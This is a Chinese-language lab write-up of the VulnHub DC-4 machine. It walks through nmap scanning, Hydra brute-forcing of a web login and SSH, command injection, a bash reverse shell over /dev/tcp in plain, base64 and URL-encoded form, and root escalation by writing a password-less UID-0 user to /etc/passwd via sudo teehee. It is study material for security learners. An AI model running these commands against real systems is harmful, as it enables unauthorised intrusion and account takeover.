
靶机信息
1
ifconfig
本机 IP:192.168.168.128
1
nmap -sn 192.168.168.0/24
扫描结果
1
nmap -p- -A 192.168.168.130
开放了 22 和 80,80 是 Web 服务。
访问目标网站,什么都没有:

页面源码也没什么:

1
dirsearch -u http://192.168.168.130/好像也没什么:

插件也什么都没有:

对了 SSH 和 Nginx 有没有版本漏洞?

感觉都不行,那只能爆破了。
bp 爆破用的 fuzzDicts 字典里的:

跑出来了:admin / happy
登录:

还有这种简单的密码爆破,没有什么验证,可以使用 hydra 爆破,比 bp 快多了:
1
hydra -l admin -P rockyou.txt 192.168.168.169 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F简单拆解如下

很快,半分钟不要就跑出来了。
备注:这里遇到个问题,只有谷歌浏览器能登录账号密码,bp 内置的谷歌和 edge 都登不上,后来发现和 cookie 有关,能把谷歌里的 cookie 写到 bp 里就能重新登了,又是环境问题,重装了一下,全都好了,ip 变成了 169。
点击命令里面:

List Files:You have selected: ls -l

Disk Usage:You have selected: du -h

Disk Free:You have selected: df -h

bp 抓包:

radio=whoami 这就是个命令执行的地方。
1
bash -i >& /dev/tcp/192.168.168.128/5678 0>&1base64 编码后发送:
1
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE2OC4xMjgvNTY3OCAwPiYx | base64 -d | bashURL 编码版本:
1
echo%20YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjE2OC4xMjgvNTY3OCAwPiYx%20%7C%20base64%20%2Dd%20%7C%20bashKali 监听:
12
nc -lvnp 5678成功监听到:


sudo -l 提示无 tty:

12
python -c 'import pty;pty.spawn("/bin/bash")'再次输入 sudo -l:

需要密码,happy 密码错误(正确才奇怪,都不是同一个东西)。
12
find / -perm -u=s 2>/dev/null
最后有一个 sh,得注意一下:/home/jim/test.sh
12
cat /etc/passwd找到点信息,exim4 有很多已知提权漏洞:

查看到有三个用户:

charles、jim、sam
分别看看里面有什么:

12
cat test.sh
"学 bash 吧,他们说。" "bash 很好用,他们说。" "但我宁愿用头撞墙。"
没什么用。
mbox 没权限:

有个密码备份:

12
cat old-passwords.bak
一个密码本,内容不是很多,直接鼠标复制。
12
echo -e "jim\ncharles\nsammy" > users.txt-e 参数是为了把 \n 识别为换行(转义符)> 为覆盖>> 为追加
12
hydra -L users.txt -P ./passwd.txt 192.168.168.169 sshhydra 常用参数:
参数 | 说明 |
|---|---|
-l | 指定单个用户名 |
-L | 指定用户名字典文件 |
-p | 指定单个密码 |
-P | 指定密码字典文件 |
-t | 并发线程数(默认16,SSH建议4) |
-v | 显示详细过程 |
-o | 结果保存到文件 |
-s | 指定端口 |
爆破出一个:

login: jim password: jibril04
12
ssh jim@192.168.168.169
连接上了,没有 sudo 可用。
看一下之前打不开的 mbox:


去邮箱里找,之前找到过 exim4 服务:Debian-exim:x:108:112::/var/spool/exim4:/bin/false
/var/spool/exim4 无权限进不去:

计划任务也没权限看:

mail 里面有个 www-data 没权限看,只能看 jim:

在邮件里找到密码:Password is: ^xHhA&hvim0y
su - charles 和 su charles 的区别:
123
su - charles
sudo -l找到 teehee。

还想在 https://gtfobins.org/ 里找的,结果找不到,那就去网上搜:
teehee 是 tee 命令的变种,可以把内容写入文件,如果有 sudo 权限执行它,就能以 root 身份往 /etc/passwd 写入新用户:
12
echo "hack::0:0:hack:/root:/bin/bash" | sudo teehee -a /etc/passwd这行意思是添加一个**没有密码、UID 为 0(root权限)**的用户 hack,然后:
123
su hack
whoami # root
成功拿到 flag:

123456789101112
信息收集(nmap)
↓
发现 Web 登录页 → Burp Suite / Hydra 爆破 → admin/happy
↓
命令执行功能 → 反弹 Shell → www-data
↓
/home/jim/backups/old-passwords.bak → Hydra 爆破 SSH → jim/jibril04
↓
jim 邮件中发现密码 → 切换 charles
↓
sudo teehee → 写入 /etc/passwd → root → flag ✅工具 | 用途 |
|---|---|
nmap | 端口扫描、服务识别 |
dirsearch | Web 目录扫描 |
Burp Suite | 抓包、密码爆破 |
Hydra | Web 表单 / SSH 密码爆破 |
nc | 反弹 Shell 监听 |
teehee | sudo 提权写入 /etc/passwd |
本文为 VulnHub DC-4 靶机学习笔记,所有操作均在本地搭建的靶场环境中完成,仅用于学习交流。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。